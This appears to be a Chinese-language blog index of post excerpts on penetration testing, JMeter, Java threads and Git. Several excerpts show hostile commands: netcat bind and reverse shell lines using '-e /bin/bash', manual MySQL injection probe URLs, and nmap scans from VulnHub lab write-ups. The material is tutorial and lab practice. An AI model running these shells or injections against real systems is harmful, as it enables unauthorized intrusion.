摘要:
一、概述: XSStrike是一个Cross Site Scripting检测套件,配备四个手写解析器,一个智能有效载荷生成器,一个强大的模糊引擎和一个非常快速的爬虫。 XSStrike不是像其他工具那样注入有效负载并检查其工作,而是通过多个解析器分析响应,然后通过与模糊引擎集成的上下文分析来保证有 阅读全文
摘要:
MySQL 手工注入: 一、判断注入点是否存在: 1.1 数字型: http://www.xxx.cn/list.php?page=4&id=524' 返回错误http://www.xxx.cn/list.php?page=4&id=524 and 1=1 返回正确http://www.xxx.cn 阅读全文
摘要:
一、JMete执行方式 JMeter执行方式有2种,一种是GUI模式,一种是非GUI模式。GUI模式就是界面模式,非GUI模式就是命令行模式。界面模式主要用来编写和调试脚本用的,项目的真正执行最好是采用命令行模式,因为采用命令行模式可以和持续集成或者其它框架进行对接,做成自动化回归测试平台。 二、J 阅读全文
摘要:
1、信息收集 1.1、netdiscover netdiscover -i eth0 -r 192.168.118.0/24 1.2、 Nmap nmap -sP -T4 192.168.118.0/24 nmap -sS -T4 -sV -O -p- 192.168.118.146 1.3 334 阅读全文
摘要:
1、信息收集 1.1、获取IP地址: map scan report for 192.168.118.137 Host is up (0.00017s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp op 阅读全文
摘要:
一、进程与线程的区别 1.进程是应用程序在内存总分配的空间。(正在运行中的程序) 2.线程是进程中负责程序执行的执行单元、执行路径。 3.一个进程中至少有一个线程在负责进程的运行。 4.一个进程中有多个线程在运行的程序,为多线程程序。 5.多线程技术是为了解决多部分代码同时执行。 6.多线程的优点是 阅读全文
摘要:
1、NC反弹shell 1.1、正向反弹shell 服务器 nc -lvvp 7777 -e /bin/bash 攻击机 nc server-ip 7777 1.2、反向反弹shell 攻击机 nc -lvvp 7777 服务器 nc -e /bin/bash Client-ip 7777 1.3、 阅读全文
摘要:
1、靶机信息 下载链接 https://download.vulnhub.com/breach/Breach-1.0.zip 靶机说明 Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战。 VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为ho 阅读全文
摘要:
一、Jmeter分布式测试基础 1、Jmeter分布式测试原因: 在使用Jmeter进行接口的性能测试时,由于Jmeter 是JAVA应用,对负载机的CPU和内存消耗比较大。所以当需要模拟数以万计的并发用户时,可能会导致单台负载本身扛不住,出现的瓶颈。为了解决以上的问题,Jmeter提供的分布式功能 阅读全文
摘要:
1、安装GIt 1.1、Win下安装git: 下载:https://git-scm.com/download/win 基本上一路回车,安装成功后,点击Git Bash,出现如下图说明安装成功: 1.2、设置名字和邮件: 2、创建版本库 版本库又名仓库,英文名repository 小结: git in 阅读全文